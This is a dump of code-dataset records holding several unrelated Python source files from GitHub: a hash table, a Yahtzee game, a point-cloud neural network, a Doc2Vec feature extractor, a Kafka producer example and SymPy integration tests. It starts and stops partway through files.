\"\"\"\r\n Checks if the location is empty or not\r\n return: True if there is no value at location\r\n False otherwise\r\n \"\"\"\r\n if self.retrieve(value) is None:\r\n return True\r\n else:\r\n return False\r\n\r\n def __str__(self):\r\n \"\"\"\r\n Returns the hash table buckets and contents as a string\r\n \"\"\"\r\n result = \"\"\r\n for i in range(self.__size):\r\n result += \"bucket \" + str(i) + \": \" + \"\\nsize: \" + str(self.__buckets[i].size()) + \"\\n\" + str(self.__buckets[i])\r\n return result\r\n\r\n def hashValue(self, value):\r\n \"\"\"\r\n Calculates the hash value\r\n param: value to calculate location\r\n return: location to place value in hash table\r\n \"\"\"\r\n if value is None:\r\n return None\r\n else:\r\n return value.getId() % self.__size\r\n\r\n def put(self, value):\r\n \"\"\"\r\n Inserts value into hash table\r\n param: value to be inserted into the table\r\n return: None if no value provided\r\n \"\"\"\r\n slot = self.hashValue(value)\r\n if value is None:\r\n return None\r\n # Assigns value to the bucket\r\n else:\r\n self.__buckets[slot].insert(value)\r\n\r\n def retrieve(self, value):\r\n slot = self.hashValue(value)\r\n if value is None:\r\n return None\r\n # Searches for value in hash table\r\n else:\r\n return self.__buckets[slot].retrieve(value)\r\n\r\n def __len__(self):\r\n return self.__size\r\n","repo_name":"graylecompte/dataStructures","sub_path":"HashBST.py","file_name":"HashBST.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"35846710607","text":"import random, datetime\nfrom score.card import ScoreCard\nfrom player import Player\n\nclass YahtzeeGame:\n \"\"\"\n A game where each player rolls dice a max number of times in a turn and \n can choose what dice to keep or throw. The player determines their score \n after ending their turn. When the game ends, the player with the \n highest score wins.\n \"\"\"\n\n # Constructor\n def __init__(self):\n # Declare constants\n self.MAX_ROLLS = 3\n self.DICE_VALUES = [1, 2, 3, 4, 5, 6]\n self.MAX_DICE_COUNT = 5\n\n # Declare variables\n self.isGameOver = False\n self.rolledDice = []\n self.rollCounter = 0\n self.endOfTurn = False\n self.diceCount = self.MAX_DICE_COUNT\n self.playersDice = []\n self.players = []\n self.curPlayerIndex = 0\n self.hasRecordedScore = False\n\n def rollDice(self):\n if self.rollCounter < self.MAX_ROLLS:\n diceCount = len(self.rolledDice) if len(self.playersDice) != 0 else self.MAX_DICE_COUNT\n random.seed(datetime.datetime.now()) # more randomness?\n self.rolledDice = random.choices(self.DICE_VALUES, k=diceCount)\n self.rollCounter += 1\n return True\n return False\n\n def keepDiceValues(self, values):\n \"\"\"Transfers dice from the rolled dice to the player's dice\"\"\"\n self.keepThrow(values, self.playersDice, self.rolledDice)\n\n def throwDiceValues(self, values):\n \"\"\"Transfers dice from the player's dice to the rolled dice\"\"\"\n self.keepThrow(values, self.rolledDice, self.playersDice)\n\n def keepThrow(self, values, addToList, subFromList):\n # values should be a list of integers\n for v in values:\n # check if the value is in the subFromList\n if v in subFromList:\n subFromList.remove(v)\n addToList.append(v)\n \n def recordScore(self, catagory):\n \"\"\"Attempts to records the player's score in the given catagory and \n returns whether or not the score was recorded. This also \n effectivly ends the player's turn.\"\"\"\n\n # Ensure that the player cannot record their score multiple times\n if self.hasRecordedScore:\n print(\"You have already recored your score for this turn.\")\n return False\n\n allDice = self.playersDice + self.rolledDice\n # TODO if the score that's about to be recorded is zero, ask the user\n # if they still want to proceed\n \n self.hasRecordedScore = self.currentPlayer().recordScore(catagory, allDice)\n return self.hasRecordedScore\n \n def addPlayer(self, name):\n # check if the player name is already in the list\n for p in self.players:\n if p.name == name:\n return False\n # add player to list\n self.players.append(Player(name))\n return True\n \n def removePlayer(self, name):\n # check if the player name is in the list\n foundPlayer = None\n for p in self.players:\n if p.name == name:\n foundPlayer = p\n break\n # remove the player from the list\n if foundPlayer:\n self.players.remove(foundPlayer)\n return True\n return False\n\n def removeAllPlayers(self):\n self.players.clear()\n\n def nextPlayer(self):\n self.curPlayerIndex += 1\n if self.curPlayerIndex >= len(self.players):\n self.curPlayerIndex = 0\n # Reset variables\n self.rollCounter = 0\n self.diceCount = self.MAX_DICE_COUNT\n self.hasRecordedScore = False\n self.playersDice.clear()\n\n if self.currentPlayer().isComplete():\n self.isGameOver = True\n \n def currentPlayer(self):\n return self.players[self.curPlayerIndex]\n\n def getRankings(self):\n listCopy = list(self.players)\n listCopy.sort(key=lambda p: p.scoreCard.getTotalScore(), reverse=True)\n\n rStr = \"\"\n for i in range(len(listCopy)):\n cur = listCopy[i]\n rStr += f'{i+1}\\t{cur.name}\\t{cur.scoreCard.getTotalScore()}\\n'\n return rStr\n\n def giveDice(self, values):\n # prevent further rolls after a give command\n self.diceCount = 0\n self.rollCounter = self.MAX_ROLLS\n self.rolledDice.clear()\n self.playersDice = values\n\n def getHelp(self):\n return \"\"\"\nroll: Rolls the remaining dice\n\nkeep: Keep the specificed dice based on the dices value\n\nthrow: Throws dice the player has back into the active dice to be rolled\n\nrecord: Scores the dice you have based on how to tell it to score. For example,\n typing 'record aces' will score into the aces catagory. Once a score is \n recorded for a catagory, you cannot change that score.\n\nscores: Shows you all the scores you have recorded.\n\nend turn: Ends your turn\n\nhelp: Shows commands and discriptions\n\nexit: Exits the game\"\"\"\n","repo_name":"Jesse-Richman/YahtzeeGame","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3517400137","text":"import os\nimport sys\nimport copy\nimport math\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom OP import pointnet2_utils\n\n\ndef knn(x, k):\n '''\n get k nearest neighbors' indices for a single point cloud feature\n :param x: x is point cloud feature, shape: [B, F, N]\n :param k: k is the number of neighbors\n :return: KNN graph, shape: [B, N, k]\n ''' \n inner = -2*torch.matmul(x.transpose(2, 1), x)\n xx = torch.sum(x**2, dim=1, keepdim=True)\n pairwise_distance = -xx - inner - xx.transpose(2, 1)\n \n idx = pairwise_distance.topk(k=k, dim=-1)[1] # (batch_size, num_points, k)\n return idx\n\ndef eigen_function(X):\n '''\n get eigen and eigenVector for a single point cloud neighbor feature\n :param X: X is a Tensor, shape: [B, N, K, F]\n :return eigen: shape: [B, N, F]\n '''\n B, N, K, F = X.shape\n # X_tranpose [N,F,K] \n X_tranpose = X.permute(0, 1, 3, 2)\n # high_dim_matrix [N, F, F]\n high_dim_matrix = torch.matmul(X_tranpose, X)\n\n high_dim_matrix = high_dim_matrix.cpu().detach().numpy()\n eigen, eigen_vec = np.linalg.eig(high_dim_matrix)\n eigen_vec = torch.Tensor(eigen_vec).cuda()\n eigen = torch.Tensor(eigen).cuda()\n\n return eigen, eigen_vec\n\n\ndef eigen_Graph(x, k=20):\n '''\n get eigen Graph for point cloud\n :param X: x is a Tensor, shape: [B, F, N]\n :param k: the number of neighbors\n :return feature: shape: [B, F, N]\n :retrun idx_EuclideanSpace: k nearest neighbors of Euclidean Space, shape[B, N, k]\n :retrun idx_EigenSpace: k nearest neighbors of Eigenvalue Space, shape[B, N, k]\n ''' \n batch_size = x.size(0)\n num_dims = x.size(1)\n num_points = x.size(2)\n device = torch.device('cuda')\n x = x.view(batch_size, -1, num_points)\n\n # idx [batch_size, num_points, k]\n idx_EuclideanSpace = knn(x, k=k) \n idx_EuclideanSpace = idx_EuclideanSpace + torch.arange(0, batch_size, device=device).view(-1, 1, 1)*num_points\n idx_EuclideanSpace = idx_EuclideanSpace.view(-1)\n \n\n x = x.transpose(2, 1).contiguous()# (batch_size, num_points, num_dims) -> (batch_size*num_points, num_dims) # batch_size * num_points * k + range(0, batch_size*num_points)\n feature = x.view(batch_size*num_points, -1)[idx_EuclideanSpace, :]\n feature = feature.view(batch_size, num_points, k, num_dims) \n \n eigen,eigen_vec = eigen_function(feature-x.view(batch_size, num_points, 1, num_dims).repeat(1, 1, k, 1))\n eigen_vec = eigen_vec.reshape([batch_size, num_points, -1])\n\n feature = torch.cat(( x, eigen, eigen_vec), dim=2)\n\n idx_EigenSpace = knn(eigen.permute(0,2,1), k=k) # (batch_size, num_points, k)\n idx_EigenSpace = idx_EigenSpace + torch.arange(0, batch_size, device=device).view(-1, 1, 1)*num_points\n idx_EigenSpace = idx_EigenSpace.view(-1)\n\n return feature.permute(0,2,1), idx_EuclideanSpace, idx_EigenSpace\n\n\ndef first_GroupLayer(x, idx_EU, idx_EI, k=20):\n '''\n group Features for point cloud (Frist Layer)\n :param x: x is a Tensor, shape: [B, F, N]\n :param idx_EU: k nearest neighbors of Euclidean Space, shape[B, N, k]\n :param idx_EI: k nearest neighbors of Eigenvalue Space, shape[B, N, k]\n :param k: the number of neighbors\n :return output feature: shape: [B, F, N, k]\n ''' \n batch_size = x.size(0)\n num_points = x.size(2)\n x = x.view(batch_size, -1, num_points)\n\n org_xyz = x[:,0:3,:] # coordinate\n org_feats = x[:,3:6,:] #eigenValue\n\n org_xyz = org_xyz.transpose(2, 1).contiguous()\n xyz = org_xyz.view(batch_size*num_points, -1)[idx_EU, :]\n xyz = xyz.view(batch_size, num_points, k, 3)\n org_xyz = org_xyz.view(batch_size, num_points, 1, 3).repeat(1, 1, k, 1) \n\n grouped_xyz = torch.cat((xyz - org_xyz, xyz), dim = 3)\n\n org_feats = org_feats.transpose(2, 1).contiguous()\n feats = org_feats.view(batch_size*num_points, -1)[idx_EI, :]\n feats = feats.view(batch_size, num_points, k, 3)\n org_feats = org_feats.view(batch_size, num_points, 1, 3).repeat(1, 1, k, 1) \n\n # feat2 = feats -org_feats\n grouped_feats = torch.cat((feats - org_feats, feats), dim = 3)\n\n output = torch.cat((grouped_xyz, grouped_feats), dim = 3).permute(0, 3, 1, 2)\n return output\n\n\n\ndef GroupLayer(x, k=20, idx=None):\n '''\n group Features for point cloud\n :param x: x is a Tensor, shape: [B, F, N]\n :param idx: k nearest neighbors , shape[B, N, k]\n :param k: the number of neighbors\n :return output feature: shape: [B, F, N, k]\n ''' \n batch_size = x.size(0)\n num_points = x.size(2)\n x = x.view(batch_size, -1, num_points)\n\n \n _, num_dims, _ = x.size()\n\n x = x.transpose(2, 1).contiguous() # (batch_size, num_points, num_dims) -> (batch_size*num_points, num_dims) # batch_size * num_points * k + range(0, batch_size*num_points)\n feature = x.view(batch_size*num_points, -1)[idx, :]\n feature = feature.view(batch_size, num_points, k, num_dims) \n x = x.view(batch_size, num_points, 1, num_dims).repeat(1, 1, k, 1)\n \n feature = torch.cat((feature-x, feature), dim=3).permute(0, 3, 1, 2)\n \n return feature\n\ndef get_graph_distance(x, k=20, idx=None):\n '''\n get Graph Distance for point cloud\n :param x: x is a Tensor, shape: [B, F, N]\n :param idx: k nearest neighbors , shape[B, N, k]\n :param k: the number of neighbors\n :return output feature: shape: [B, F, N, k]\n ''' \n batch_size = x.size(0)\n num_points = x.size(2)\n x = x.view(batch_size, -1, num_points)\n device = torch.device('cuda')\n _, num_dims, _ = x.size()\n\n\n x = x.transpose(2, 1).contiguous() # (batch_size, num_points, num_dims) -> (batch_size*num_points, num_dims) # batch_size * num_points * k + range(0, batch_size*num_points)\n knn_points = x.view(batch_size*num_points, -1)[idx, :]#[B,N,K,3]\n knn_points = knn_points.view(batch_size, num_points, k, num_dims) \n\n x = x.view(batch_size, num_points, 1, num_dims).repeat(1, 1, k, 1)\n distance = knn_points-x #[B,N,K,3]\n distance = torch.sqrt(torch.sum(distance * distance, dim = -1))# [B,N,K]\n\n return distance.reshape((batch_size,1,num_points,k))\n\n\n\n\nclass GSNET(nn.Module):\n def __init__(self, args, output_channels=40):\n super(GSNET, self).__init__()\n self.args = args\n self.k = args.k\n \n self.bn1 = nn.BatchNorm2d(64)\n self.bn2 = nn.BatchNorm2d(64)\n self.bn3 = nn.BatchNorm2d(128)\n # self.bn4 = nn.BatchNorm2d(256)\n self.bn5 = nn.BatchNorm1d(args.emb_dims)\n\n self.conv1 = nn.Sequential(nn.Conv2d(13, 64, kernel_size=1, bias=False),\n self.bn1,\n nn.LeakyReLU(negative_slope=0.2))\n self.conv2 = nn.Sequential(nn.Conv2d(64*4, 64, kernel_size=1, bias=False),\n self.bn2,\n nn.LeakyReLU(negative_slope=0.2))\n self.conv3 = nn.Sequential(nn.Conv2d(64*4, 128, kernel_size=1, bias=False),\n self.bn3,\n nn.LeakyReLU(negative_slope=0.2))\n self.conv5 = nn.Sequential(nn.Conv1d(256, args.emb_dims, kernel_size=1, bias=False),\n self.bn5,\n nn.LeakyReLU(negative_slope=0.2))\n self.linear1 = nn.Linear(args.emb_dims*2, 512, bias=False)\n self.bn6 = nn.BatchNorm1d(512)\n self.dp1 = nn.Dropout(p=args.dropout)\n self.linear2 = nn.Linear(512, 256)\n self.bn7 = nn.BatchNorm1d(256)\n self.dp2 = nn.Dropout(p=args.dropout)\n self.linear3 = nn.Linear(256, output_channels)\n\n\n\n def GSCM(self, points, feats, k, conv, isFirstLayer=False):\n '''\n Geometry Similarity Connection Module\n :param points: points' coordinates, shape: [B, N, 3]\n :param feats: points' feature, shape: [B, N, F]\n :param k: the number of neighbors\n :param conv: convolution layers\n :return output feature: shape: [B, F, N]\n ''' \n if isFirstLayer:\n x, idx_EU, idx_EI = eigen_Graph(points.permute(0,2,1).contiguous(), k=k)\n x = first_GroupLayer(x, idx_EU, idx_EI,k=k)\n distance = get_graph_distance(points.permute(0,2,1).contiguous(),k=k, idx = idx_EU)\n x = torch.cat((x, distance),dim = 1) \n else:\n _, idx_EU, idx_EI = eigen_Graph(points.permute(0,2,1).contiguous(), k=k)\n x_knn_EU = GroupLayer(feats, k=k, idx=idx_EU)\n x_knn_EI = GroupLayer(feats, k=k, idx=idx_EI)\n x = torch.cat((x_knn_EU,x_knn_EI),dim = 1)\n x = conv(x) \n x = x.max(dim=-1, keepdim=False)[0]\n return x\n\n\n def forward(self, x):\n batch_size = x.size(0)\n num_points_1 = x.size(2)\n num_points_2 = int(num_points_1/2)\n num_points_3 = int(num_points_1/4)\n\n ########################BLOCK1##############################\n N1_points = x.permute(0,2,1).contiguous()\n x1 = self.GSCM( N1_points, None, self.k, self.conv1, isFirstLayer=True)\n\n ########################BLOCK2##############################\n fps_id_2 = pointnet2_utils.furthest_point_sample(N1_points, num_points_2)\n N2_points = (\n pointnet2_utils.gather_operation(\n N1_points.transpose(1, 2).contiguous(), fps_id_2\n ).transpose(1, 2).contiguous())\n x1_downSample = (\n pointnet2_utils.gather_operation(\n x1, fps_id_2)\n )\n x2 = self.GSCM( N2_points, x1_downSample, self.k, self.conv2)\n\n ########################BLOCK3##############################\n fps_id_3 = pointnet2_utils.furthest_point_sample(N2_points, num_points_3)\n N3_points = (\n pointnet2_utils.gather_operation(\n N2_points.transpose(1, 2).contiguous(), fps_id_3\n ).transpose(1, 2).contiguous())\n x2_downSample = (\n pointnet2_utils.gather_operation(\n x2, fps_id_3)\n )\n x1_downSample = (\n pointnet2_utils.gather_operation(\n x1_downSample, fps_id_3)\n ) \n x3 = self.GSCM( N3_points, x2_downSample, self.k, self.conv3)\n\n\n x = torch.cat((x1_downSample, x2_downSample, x3), dim=1)\n\n x = self.conv5(x)\n x1 = F.adaptive_max_pool1d(x, 1).view(batch_size, -1)\n x2 = F.adaptive_avg_pool1d(x, 1).view(batch_size, -1)\n x = torch.cat((x1, x2), 1)\n\n x = F.leaky_relu(self.bn6(self.linear1(x)), negative_slope=0.2)\n x = self.dp1(x)\n x = F.leaky_relu(self.bn7(self.linear2(x)), negative_slope=0.2)\n x = self.dp2(x)\n x = self.linear3(x)\n return x\n","repo_name":"MingyeXu/GS-Net","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10758,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"75"} +{"seq_id":"31091425518","text":"import random\nimport multiprocessing\nimport gensim.models.doc2vec\nfrom collections import OrderedDict\nimport pandas as pd\nimport nltk\nfrom nltk.corpus import stopwords\n\nfrom gensim.models.doc2vec import Doc2Vec, TaggedDocument\nfrom datetime import datetime\nfrom sherlock.global_state import is_first\n\nassert gensim.models.word2vec_inner.FAST_VERSION > -1, \"This will be painfully slow otherwise\"\n\n\ndef tokenise(values):\n joined = \" \".join(s for s in values if len(s) >= 2)\n\n # stopwords need apostrophe\n filtered = \"\".join(\n e for e in joined if e.isalnum() or e.isspace() or e == \"'\"\n ).lower()\n\n return [\n word\n for word in nltk.word_tokenize(filtered)\n if len(word) >= 2 and word not in STOPWORDS_ENGLISH\n ]\n\n\n# Input: a collection of columns stored in a dataframe column 'values'\n# Output: tagged columns.\n# Only needed for training.\ndef tagcol_paragraph_embeddings_features(train_data: pd.Series, train_labels: list):\n random.seed(13)\n\n columns = []\n\n for i, col in enumerate(train_data):\n label = train_labels[i]\n values = random.sample(col, min(1000, len(col)))\n\n if len(values) > 0:\n values = list(map(lambda s: \"\" if s is None else str(s), values))\n\n tokens = tokenise(values)\n\n columns.append(TaggedDocument(tokens, label))\n\n return columns\n\n\n# Input: returned tagged document collection from tagcol_paragraph_embeddings_features\n# Output: a stored retrained model\n# Only needed for training.\ndef train_paragraph_embeddings_features(columns, dim):\n # Train Doc2Vec model\n train_model = Doc2Vec(\n columns,\n dm=0,\n negative=3,\n workers=multiprocessing.cpu_count(),\n vector_size=dim,\n epochs=20,\n min_count=2,\n seed=13,\n )\n\n # Save trained model\n model_file = f\"../sherlock/features/par_vec_trained_{dim}.pkl\"\n\n train_model.save(model_file)\n train_model.delete_temporary_training_data(\n keep_doctags_vectors=True, keep_inference=True\n )\n\n\nDIM = 400\nmodel: Doc2Vec\n\n\ndef initialise_pretrained_model(dim):\n start = datetime.now()\n global model\n\n filename = f\"../sherlock/features/par_vec_trained_{dim}.pkl\"\n\n assert dim == DIM\n\n model = Doc2Vec.load(filename)\n model.delete_temporary_training_data(keep_doctags_vectors=True, keep_inference=True)\n print(\n f\"Initialise Doc2Vec Model, {dim} dim, process took {datetime.now() - start} seconds. (filename = {filename})\"\n )\n\n\nSTOPWORDS_ENGLISH = None\n\n\ndef initialise_nltk():\n start = datetime.now()\n\n nltk.download(\"punkt\")\n nltk.download(\"stopwords\")\n\n global STOPWORDS_ENGLISH\n\n STOPWORDS_ENGLISH = stopwords.words(\"english\")\n\n print(f\"Initialised NLTK, process took {datetime.now() - start} seconds.\")\n\n\n# Input: a single column in the form of a pandas Series.\n# Output: ordered dictionary holding paragraph vector features\ndef infer_paragraph_embeddings_features(\n col_values: list, features: OrderedDict, dim, reuse_model\n):\n if not reuse_model or model is None:\n # Load pretrained paragraph vector model\n initialise_pretrained_model(dim)\n\n # Resetting the random seed before inference keeps the inference vectors deterministic. Gensim uses random values\n # in the inference process, so setting the seed just beforehand makes the inference repeatable.\n # https://github.com/RaRe-Technologies/gensim/issues/447\n\n # To make the inference repeatable across runtime launches, we also need to set PYTHONHASHSEED\n # prior to launching the execution environment (i.e. jupyter notebook). E.g. export PYTHONHASHSEED=13\n # See above Github thread for more information.\n model.random.seed(13)\n\n tokens = tokenise(col_values)\n\n # Infer paragraph vector for data sample.\n inferred = model.infer_vector(tokens, steps=20, alpha=0.025)\n\n if is_first():\n # the first output needs fully expanded keys (to drive CSV header)\n for idx, value in enumerate(inferred):\n features[\"par_vec_\" + str(idx)] = value\n else:\n # subsequent lines only care about values, so we can pre-render a block of CSV. This\n # cuts overhead of storing granular values in the features dictionary\n features[\"par_vec-pre-rendered\"] = \",\".join(map(lambda x: \"%g\" % x, inferred))\n","repo_name":"mitmedialab/sherlock-project","sub_path":"sherlock/features/paragraph_vectors.py","file_name":"paragraph_vectors.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","stars":127,"dataset":"github-code","pt":"75"} +{"seq_id":"72617508721","text":"# from confluent_kafka import Producer\n#\n# p = Producer({'bootstrap.servers': 'localhost:9092'})\n# p.produce('mytopic2', key='hello', value='world')\n# p.flush(30)\n\n\nfrom confluent_kafka import Producer\nimport random\nimport argparse\n\n\ndef acked(err, msg):\n if err is not None:\n print(\"Failed to deliver message: {0}: {1}\"\n .format(msg.value(), err.str()))\n else:\n print(\"Message produced: {0}\".format(msg.value()))\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"ip\", help=\"IP address\")\nparser.add_argument(\"port\", help=\"Port no.\")\nargs = parser.parse_args()\n\naddress = \"\" + args.ip + \":\" + args.port\np = Producer({'bootstrap.servers': address})\n\ntry:\n for val in xrange(1, 10000):\n p.produce('mytopic', 'myvalue #{0}'\n .format(random.choice('abcdefghijklmnopqrstuvwxyz')), callback=acked)\n\n\nexcept KeyboardInterrupt:\n pass\n\np.flush(30)\n\n","repo_name":"gunanksood/kafka-implementation","sub_path":"produce_example.py","file_name":"produce_example.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14570892666","text":"\"\"\"Most of these tests come from the examples in Bronstein's book.\"\"\"\nfrom sympy import Poly, Matrix, S, symbols, I\nfrom sympy.integrals.risch import DifferentialExtension\nfrom sympy.integrals.prde import (prde_normal_denom, prde_special_denom,\n prde_linear_constraints, constant_system, prde_spde, prde_no_cancel_b_large,\n prde_no_cancel_b_small, limited_integrate_reduce, limited_integrate,\n is_deriv_k, is_log_deriv_k_t_radical, parametric_log_deriv_heu,\n is_log_deriv_k_t_radical_in_field)\n\nfrom sympy.abc import x, t, n\n\nt0, t1, t2, t3, k = symbols('t:4 k')\n\n\ndef test_prde_normal_denom():\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1 + t**2, t)]})\n fa = Poly(1, t)\n fd = Poly(x, t)\n G = [(Poly(t, t), Poly(1 + t**2, t)), (Poly(1, t), Poly(x + x*t**2, t))]\n assert prde_normal_denom(fa, fd, G, DE) == \\\n (Poly(x, t), (Poly(1, t), Poly(1, t)), [(Poly(x*t, t),\n Poly(t**2 + 1, t)), (Poly(1, t), Poly(t**2 + 1, t))], Poly(1, t))\n G = [(Poly(t, t), Poly(t**2 + 2*t + 1, t)), (Poly(x*t, t),\n Poly(t**2 + 2*t + 1, t)), (Poly(x*t**2, t), Poly(t**2 + 2*t + 1, t))]\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t, t)]})\n assert prde_normal_denom(Poly(x, t), Poly(1, t), G, DE) == \\\n (Poly(t + 1, t), (Poly((-1 + x)*t + x, t), Poly(1, t)), [(Poly(t, t),\n Poly(1, t)), (Poly(x*t, t), Poly(1, t)), (Poly(x*t**2, t),\n Poly(1, t))], Poly(t + 1, t))\n\n\ndef test_prde_special_denom():\n a = Poly(t + 1, t)\n ba = Poly(t**2, t)\n bd = Poly(1, t)\n G = [(Poly(t, t), Poly(1, t)), (Poly(t**2, t), Poly(1, t)), (Poly(t**3, t), Poly(1, t))]\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t, t)]})\n assert prde_special_denom(a, ba, bd, G, DE) == \\\n (Poly(t + 1, t), Poly(t**2, t), [(Poly(t, t), Poly(1, t)),\n (Poly(t**2, t), Poly(1, t)), (Poly(t**3, t), Poly(1, t))], Poly(1, t))\n G = [(Poly(t, t), Poly(1, t)), (Poly(1, t), Poly(t, t))]\n assert prde_special_denom(Poly(1, t), Poly(t**2, t), Poly(1, t), G, DE) == \\\n (Poly(1, t), Poly(t**2 - 1, t), [(Poly(t**2, t), Poly(1, t)),\n (Poly(1, t), Poly(1, t))], Poly(t, t))\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(-2*x*t0, t0)]})\n DE.decrement_level()\n G = [(Poly(t, t), Poly(t**2, t)), (Poly(2*t, t), Poly(t, t))]\n assert prde_special_denom(Poly(5*x*t + 1, t), Poly(t**2 + 2*x**3*t, t), Poly(t**3 + 2, t), G, DE) == \\\n (Poly(5*x*t + 1, t), Poly(0, t), [(Poly(t, t), Poly(t**2, t)),\n (Poly(2*t, t), Poly(t, t))], Poly(1, x))\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly((t**2 + 1)*2*x, t)]})\n G = [(Poly(t + x, t), Poly(t*x, t)), (Poly(2*t, t), Poly(x**2, x))]\n assert prde_special_denom(Poly(5*x*t + 1, t), Poly(t**2 + 2*x**3*t, t), Poly(t**3, t), G, DE) == \\\n (Poly(5*x*t + 1, t), Poly(0, t), [(Poly(t + x, t), Poly(x*t, t)),\n (Poly(2*t, t, x), Poly(x**2, t, x))], Poly(1, t))\n assert prde_special_denom(Poly(t + 1, t), Poly(t**2, t), Poly(t**3, t), G, DE) == \\\n (Poly(t + 1, t), Poly(0, t), [(Poly(t + x, t), Poly(x*t, t)), (Poly(2*t, t, x),\n Poly(x**2, t, x))], Poly(1, t))\n\n\ndef test_prde_linear_constraints():\n DE = DifferentialExtension(extension={'D': [Poly(1, x)]})\n G = [(Poly(2*x**3 + 3*x + 1, x), Poly(x**2 - 1, x)), (Poly(1, x), Poly(x - 1, x)),\n (Poly(1, x), Poly(x + 1, x))]\n assert prde_linear_constraints(Poly(1, x), Poly(0, x), G, DE) == \\\n ((Poly(2*x, x), Poly(0, x), Poly(0, x)), Matrix([[1, 1, -1], [5, 1, 1]]))\n G = [(Poly(t, t), Poly(1, t)), (Poly(t**2, t), Poly(1, t)), (Poly(t**3, t), Poly(1, t))]\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t, t)]})\n assert prde_linear_constraints(Poly(t + 1, t), Poly(t**2, t), G, DE) == \\\n ((Poly(t, t), Poly(t**2, t), Poly(t**3, t)), Matrix())\n G = [(Poly(2*x, t), Poly(t, t)), (Poly(-x, t), Poly(t, t))]\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1/x, t)]})\n prde_linear_constraints(Poly(1, t), Poly(0, t), G, DE) == \\\n ((Poly(0, t), Poly(0, t)), Matrix([[2*x, -x]]))\n\n\ndef test_constant_system():\n A = Matrix([[-(x + 3)/(x - 1), (x + 1)/(x - 1), 1],\n [-x - 3, x + 1, x - 1],\n [2*(x + 3)/(x - 1), 0, 0]])\n u = Matrix([(x + 1)/(x - 1), x + 1, 0])\n DE = DifferentialExtension(extension={'D': [Poly(1, x)]})\n assert constant_system(A, u, DE) == \\\n (Matrix([[1, 0, 0],\n [0, 1, 0],\n [0, 0, 0],\n [0, 0, 1]]), Matrix([0, 1, 0, 0]))\n\n\ndef test_prde_spde():\n D = [Poly(x, t), Poly(-x*t, t)]\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1/x, t)]})\n # TODO: when bound_degree() can handle this, test degree bound from that too\n assert prde_spde(Poly(t, t), Poly(-1/x, t), D, n, DE) == \\\n (Poly(t, t), Poly(0, t), [Poly(2*x, t), Poly(-x, t)],\n [Poly(-x**2, t), Poly(0, t)], n - 1)\n\n\ndef test_prde_no_cancel():\n # b large\n DE = DifferentialExtension(extension={'D': [Poly(1, x)]})\n assert prde_no_cancel_b_large(Poly(1, x), [Poly(x**2, x), Poly(1, x)], 2, DE) == \\\n ([Poly(x**2 - 2*x + 2, x), Poly(1, x)], Matrix([[1, 0, -1, 0],\n [0, 1, 0, -1]]))\n assert prde_no_cancel_b_large(Poly(1, x), [Poly(x**3, x), Poly(1, x)], 3, DE) == \\\n ([Poly(x**3 - 3*x**2 + 6*x - 6, x), Poly(1, x)], Matrix([[1, 0, -1, 0],\n [0, 1, 0, -1]]))\n # b small\n # XXX: Is there a better example of a monomial with D.degree() > 2?\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t**3 + 1, t)]})\n\n # My original q was t**4 + t + 1, but this solution implies q == t**4\n # (c1 = 4), with some of the ci for the original q equal to 0.\n G = [Poly(t**6, t), Poly(x*t**5, t), Poly(t**3, t), Poly(x*t**2, t), Poly(1 + x, t)]\n assert prde_no_cancel_b_small(Poly(x*t, t), G, 4, DE) == \\\n ([Poly(t**4/4 - x/12*t**3 + x**2/24*t**2 + (-S(11)/12 - x**3/24)*t + x/24, t),\n Poly(x/3*t**3 - x**2/6*t**2 + (-S(1)/3 + x**3/6)*t - x/6, t), Poly(t, t),\n Poly(0, t), Poly(0, t)], Matrix([[1, 0, -1, 0, 0, 0, 0, 0, 0, 0],\n [0, 1, -S(1)/4, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 1, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0, 0],\n [1, 0, 0, 0, 0, -1, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0, -1, 0, 0, 0],\n [0, 0, 1, 0, 0, 0, 0, -1, 0, 0],\n [0, 0, 0, 1, 0, 0, 0, 0, -1, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0, -1]]))\n\n # TODO: Add test for deg(b) <= 0 with b small\n\n\ndef test_limited_integrate_reduce():\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1/x, t)]})\n assert limited_integrate_reduce(Poly(x, t), Poly(t**2, t), [(Poly(x, t),\n Poly(t, t))], DE) == \\\n (Poly(t, t), Poly(-1/x, t), Poly(t, t), 1, (Poly(x, t), Poly(1, t)),\n [(Poly(-x*t, t), Poly(1, t))])\n\n\ndef test_limited_integrate():\n DE = DifferentialExtension(extension={'D': [Poly(1, x)]})\n G = [(Poly(x, x), Poly(x + 1, x))]\n assert limited_integrate(Poly(-(1 + x + 5*x**2 - 3*x**3), x),\n Poly(1 - x - x**2 + x**3, x), G, DE) == \\\n ((Poly(x**2 - x + 2, x), Poly(x - 1, x)), [2])\n G = [(Poly(1, x), Poly(x, x))]\n assert limited_integrate(Poly(5*x**2, x), Poly(3, x), G, DE) == \\\n ((Poly(5*x**3/9, x), Poly(1, x)), [0])\n\n\ndef test_is_log_deriv_k_t_radical():\n DE = 